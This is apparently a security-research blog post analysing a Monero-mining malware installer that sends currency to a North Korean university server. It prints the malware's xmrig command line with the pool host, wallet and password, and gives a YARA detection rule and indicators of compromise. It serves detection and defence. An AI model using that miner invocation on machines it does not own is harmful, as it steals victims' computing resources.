North Korea needs Monero and is using you to mine it

Monero is the 13th biggest cryptocurrency by value and has been sold as being more secure than bitcoin. As of the time of writing 1 Monero (XMR) was worth USD 318.16. With rising prices and lack of tracking (unlike bitcoin which can be tracked with wallets) its becoming a prime choice for criminals.

A piece of malware has been found, that places a mining application on a victim’s computer. It is an installer for software to mine the Monero crypto-currency. Any mined currency is sent to Kim Il Sung University in Pyongyang, North Korea.

Once the discovered installer is run, it copies a file named intelservice.exe to the system, which is often associated with cryptocurrency mining malware. The arguments the file is executed with reveal it is a piece of software called xmrig, a program already associated with wide campaigns exploiting unpatched IIS servers to mine Monero.

Analysis of the file revealed both the address of the Monero wallet and the password (KJU, possible reference to Kim Jong-un) it uses, as well as the fact that it sends the mined currency to the server barjuok.ryongnamsan.edu[.]kp server. The use of this domain reveals that the server is located at Kim Il Sung University.

The Installer copies a file named intelservice.exe to the system. It’s executed with, it’s likely a piece of software called xmrig. The Installer executes Xmrig with the following command:

"-o barjuok.ryongnamsan.edu.kp:5615 -u 4JUdGzvrMFDWrUUwY... -p KJU" + processorCount + " -k -t " + (processorCount -1)"

The installer passes xmrig the following arguments:

• 4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRy5YeFCqgoUMnzumvS is the address of the Monero wallet
• ryongnamsan.edu[.]kp is the mining server that would receive any mined currency. The ryongnamsan.edu[.]kp domain indicates this server is located at Kim Il Sung University.
• The password, KJU, is a possible reference to Kim Jong-un

The hostname barjuok.ryongnamsan.edu[.]kp address doesn’t currently resolve. That means the software can’t send mined currency to the authors – on most networks. It may be that:

• The application is designed to be run within another network, such as that of the university itself.
• The address used to resolve but no longer exists.
• The usage of a North Korean server is a prank to trick security researchers.

It’s not clear if we’re looking at an early test of an attack, or part of a ‘legitimate’ mining operation where the owners of the hardware are aware of the mining.

On the one hand the sample contains obvious messages printed for debugging that an attacker would avoid. But it also contains fake filenames that appear to be an attempt to avoid detection of the installed mining software.

If the software author is at KSU, they may not be North Korean. KSU is an unusually open University, and has a number of foreign students and lecturers.

There are two other pieces of software which share some code:

• 762c3249904a8bf76802effb54426655
• 42344bb45f351757e8638656e12a0135

Based on the compilation string, initial upload location and French text – it’s likely the author of these two other samples is from Morocco. Therefore the software maybe created by entirely different authors that copied code from the same location, for example a forum.

Despite the sample being almost 11 days old, Virustotal shows only 9 AV vendors have a signature for it:

Alienvault has made a YARA rule you can use to block it:

rule nkminer_monero {

meta:
description = “Detects installer of Monero miner that points to a NK domain”
author = “[email protected]”
tlp = “white”
license = “MIT License”

strings:
$a = “82e999fb-a6e0-4094-aa1f-1a306069d1a5” nocase wide ascii
$b =  “4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRy5YeFCqgoUMnzumvS” nocase wide ascii
$c = “barjuok.ryongnamsan.edu.kp” nocase wide ascii
$d = “C:\\SoftwaresInstall\\soft” nocase wide ascii
$e = “C:\\Windows\\Sys64\\intelservice.exe” nocase wide ascii
$f = “C:\\Windows\\Sys64\\updater.exe” nocase wide ascii
$g = “C:\\Users\\Jawhar\\documents\\” nocase wide ascii
condition:
any of them
}

As usual, here are the indicators of compromise:

type	value
Destination IP	175.45.178.19
hostname	barjuok.ryongnamsan.edu.kp
md5	762c3249904a8bf76802effb54426655
md5	42344bb45f351757e8638656e12a0135
md5	6a261443299788af1467142d5f538b2c
md5	762c3249904a8bf76802effb54426655
md5	42344bb45f351757e8638656e12a0135
md5	6a261443299788af1467142d5f538b2c
sha1	0def199dbdb8dccf380511f67138088148ea83a3
sha1	7cab4853c370a2dd299a5ab3ebeccfe17455cb43
sha1	8965381377a884aa68eeb451b3e62175968b0b04
sha256	42300b6a09f183ae167d7a11d9c6df21d022a5f02df346350d3d875d557d3b76
sha256	0024e32c0199ded445c0b968601f21cc92fc0c534d2642f2dd64c1c978ff01f3
sha256	c599f3ca3417169e4a620b8231f8a97ccc63e291b9e09c888e6807dd90f1f17c

References:

• https://www.alienvault.com/blogs/labs-research/a-north-korean-monero-cryptocurrency-miner
• http://www.securityweek.com/monero-miner-sends-cryptocurrency-north-korean-university
• https://www.cnbc.com/2018/01/09/north-korea-hackers-create-malware-to-mine-monero.html
• https://www.virustotal.com/en/file/42300b6a09f183ae167d7a11d9c6df21d022a5f02df346350d3d875d557d3b76/analysis/1515484535/
• https://malwareintel.io/2018/01/09/north-korean-monero-cryptocurrency-miner/
• https://www.hybrid-analysis.com/sample/0024e32c0199ded445c0b968601f21cc92fc0c534d2642f2dd64c1c978ff01f3?environmentId=100

Header image from: ukrnames.com